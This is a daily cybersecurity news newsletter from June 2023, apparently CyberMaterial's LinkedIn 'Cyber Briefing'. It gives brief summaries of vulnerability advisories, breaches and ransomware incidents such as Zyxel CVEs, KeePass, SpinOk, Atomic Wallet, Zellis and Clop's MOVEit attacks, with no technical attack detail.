Cyber Briefing - 2023.06.06

Cyber Briefing - 2023.06.06

The latest in cybersecurity: CISA KEV, Ubuntu, Linux, KeePass, SpinOk Malware, Google Play, GIGABYTE, Atomic Wallet, Scrubs & Beyond, BBC, British Airways, Clop Ransomware gang.

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please subscribe.



No alt text provided for this image

🚨 Cyber Alerts


1. CISA Adds New Vulnerabilities to Catalog

The Cybersecurity and Infrastructure Security Agency (CISA) has identified and added two new vulnerabilities, CVE-2023-33009 and CVE-2023-33010, to its Known Exploited Vulnerabilities Catalog due to evidence of active exploitation. These vulnerabilities, related to buffer overflow in Zyxel Multiple Firewalls, are commonly targeted by malicious cyber actors and pose significant risks to the federal enterprise. While the Binding Operational Directive 22-01 specifically addresses FCEB agencies, CISA strongly advises all organizations to prioritize timely remediation of these vulnerabilities to reduce the risk of cyberattacks. Stay vigilant and take immediate action to secure your networks against active threats.


2. Ubuntu Fixes Linux Vulnerabilities, Urges Updates

Between May 29 and June 4, 2023, Ubuntu released Security Notices to address significant vulnerabilities in the Linux kernel affecting various Ubuntu products, including Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, Ubuntu 18.04 ESM, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10.

The Canadian Cyber Centre strongly advises users and administrators to visit the provided web link and promptly apply the necessary updates to protect their systems. Ubuntu Security Notices are issued by developers when security issues are resolved in official Ubuntu packages, ensuring the ongoing security of the Ubuntu ecosystem.


3. Cybercriminals Target Banking Accounts in Latin America

An unidentified cybercrime threat actor has launched a targeted campaign aimed at compromising online banking accounts in Mexico, Peru, and Portugal, primarily focusing on Spanish and Portuguese-speaking victims. Dubbed Operation CMDStealer, the campaign employs tactics such as LOLBaS and CMD-based scripts to carry out its malicious activities, as detailed by the BlackBerry Research and Intelligence Team. The attack chain relies on social engineering techniques, utilizing tax- or traffic violation-themed lures in Portuguese and Spanish emails to trigger infections and gain unauthorized access to victims' systems.


4. KeePass Resolves Password Extraction Vulnerability

KeePass, the popular password manager, has resolved the CVE-2023-32784 vulnerability that allowed the extraction of the clear-text master password from the client's memory. The flaw was exploited by a recently released Proof-of-Concept (PoC) tool that targeted KeePass 2.X versions. The vulnerability stemmed from the use of a custom-developed text box in KeePass, which created leftover strings in memory, allowing an attacker to retrieve the password. With the release of KeePass version 2.54, the company has fixed the bug and advised users to update their installations or take precautionary measures to protect their sensitive information.


5. SpinOk Malware Infects Android Apps: Millions at Risk

CloudSEK's security team uncovered a new wave of Android apps on Google Play infected with the SpinOk malware, which has reportedly been installed over 30 million times. They identified 193 apps carrying the malicious SDK, with 43 still active on the platform. Initially discovered by Dr. Web, SpinOk utilizes an SDK supply chain attack, posing as legitimate mini-games while secretly stealing files and tampering with clipboard contents. Despite CloudSEK's report and communication with Google, many of the infected apps are still available for download, highlighting the challenges of addressing supply chain attacks on large software distribution platforms like Google Play.


6. GIGABYTE Fixes Motherboard Vulnerabilities

GIGABYTE has swiftly responded to security vulnerabilities in over 270 motherboards by releasing firmware updates that address the flaws. The vulnerabilities were discovered by Eclypsium, who found weaknesses in GIGABYTE's legitimate feature used for installing a software auto-update application in Windows. These vulnerabilities could potentially allow attackers to deliver malware through man-in-the-middle attacks, prompting GIGABYTE to release firmware updates for Intel and AMD series motherboards and implement stricter security measures to enhance system protection. Users are advised to install the updates and take additional steps to remove the GIGABYTE auto-update application if desired.


No alt text provided for this image

💥 Cyber Incidents


7. Crypto Theft: Atomic Wallet Investigates $35M+

Atomic Wallet, a popular mobile and desktop crypto wallet, is currently investigating a large-scale theft of cryptocurrency from users' wallets, with over $35 million reportedly stolen. The developers have taken immediate action by working with third-party security companies to investigate the incident and block the stolen funds from being sold on exchanges. Users are advised to transfer their crypto assets to other wallets while the investigation is underway. The cause of the breach remains unclear, and victims are urged to provide information on the incident through a dedicated Google Docs form.


8. Severe Data Exposure at Scrubs & Beyond

A popular online retailer, Scrubs & Beyond, specializing in healthcare uniforms and accessories, has experienced a major data exposure incident, leading to the public disclosure of customers' personally identifiable information and sensitive financial data. The exposed server, which contains over 100,000 customer records totaling 400 GB, including credit card details and PayPal payment logs, is accessible to anyone with knowledge of tools like Shodan. Despite being alerted multiple times about the issue, the company has not responded, raising concerns about its handling of the situation and commitment to security.


9. Spanish Bank Hit by Ransomware

A major Spanish bank, Globalcaja, has confirmed that it is dealing with a ransomware attack that has affected several of its offices. The Play ransomware group has claimed responsibility for the attack, stating that they have stolen private and personal confidential data, including client and employee documents, passports, and contracts. While the bank assures that the attack has not affected client transactions or accounts, security protocols have been activated, and some operations have been temporarily limited. This incident adds to the growing number of ransomware attacks targeting Spanish financial institutions in 2023, highlighting the need for enhanced cybersecurity measures across the industry.


10. Martinique Endures Prolonged Cyberattack

The Caribbean island of Martinique is grappling with a relentless cyberattack that has caused extensive disruptions to its internet access and overall infrastructure for an extended period. With a population of approximately 360,000, Martinique is a French-controlled territory functioning as an outermost region of the European Union. The cyberattack, which began on May 16, has significantly impacted the community, prompting officials to isolate affected systems and engage cybersecurity experts to gradually restore operations. As the island faces ongoing challenges, measures are being implemented to restore internet access in educational institutions and establish alternative procedures for financial services and social benefit payments, while authorities investigate the attack and provide guidance on cybersecurity protocols.


11. BBC and BA Data Breach via Zellis

The BBC and British Airways have fallen victim to a data breach that exposed the personal information of their employees due to a cyber incident affecting their payroll provider, Zellis. While the extent of the breach is being urgently investigated, neither company believes that employees' bank account details were compromised. Zellis, which serves as a payroll processor for numerous other companies, potentially impacting a larger number of entities, including notable clients like Jaguar Land Rover, Iceland, Dyson, and Aer Lingus.


12. University Investigates Cyber Attack

The University of Rochester is currently investigating a cybersecurity attack that has been caused by a software vulnerability in a third-party file transfer company's product. The breach has affected not only the University but also 2,500 organizations globally. While the full extent of the impact and the accessed personal data are still unknown, the University's IT staff is working closely with the FBI and an external data forensic firm to assess the situation and determine necessary actions. The University urges students, faculty, staff, and dependents to take immediate steps to protect their personal information and advises contacting financial institutions and credit monitoring agencies in case of suspicious activity.


No alt text provided for this image

📢 Cyber News


13. Kaspersky Unveils iOS Malware Scanner

Cybersecurity firm Kaspersky has unveiled a tool to detect a new 'Triangulation' malware infecting Apple iPhones and other iOS devices. The malware, discovered by Kaspersky on its own network, has been spreading since at least 2019, infecting multiple iOS devices globally. The malware campaign, known as 'Operation Triangulation,' exploits an unknown zero-day vulnerability in iMessage to execute code without user interaction, allowing attackers to download additional payloads for command execution and information collection. Kaspersky's scanner will help individuals and organizations identify possible compromises and safeguard against state-sponsored espionage.


14. Infamous Hacker Group Revives BreachedForums

According to rumors, the notorious hacker group ShinyHunters will be taking over the now-defunct cybercrime market BreachedForums, as announced by vx-underground on Twitter. ShinyHunters, known for their involvement in major data breaches like T-Mobile and AT&T, is set to lead the revived forum under new administration. The news has sparked interest and concerns within the cybersecurity community, given the group's history of ruthlessness and successful breaches, potentially leading to increased cyber threats in the near future.


15. Clop Gang: MOVEit Extortion Masterminds Revealed!

The notorious Clop ransomware gang has claimed responsibility for the recent data theft attacks on multiple companies' servers using a zero-day vulnerability in MOVEit Transfer. This revelation confirms Microsoft's attribution of the attacks to the hacking group known as 'Lace Tempest' or TA505. Clop, known for its strategic timing, exploited the vulnerability during the Memorial Day holiday weekend, similar to their past large-scale exploitation attacks during holidays when staff is minimal. The group has not started extorting victims yet, but if the ransom is not paid, the stolen data will be publicly displayed on their leak site.


No alt text provided for this image

Subscribe and Comment.

Copyright © 2023 CyberMaterial. All Rights Reserved.

Follow CyberMaterial on:

LinkedInTwitterRedditInstagramFacebookYoutube, and Medium.

























































To view or add a comment, sign in

More articles by CyberMaterial

Insights from the community

Others also viewed

Explore topics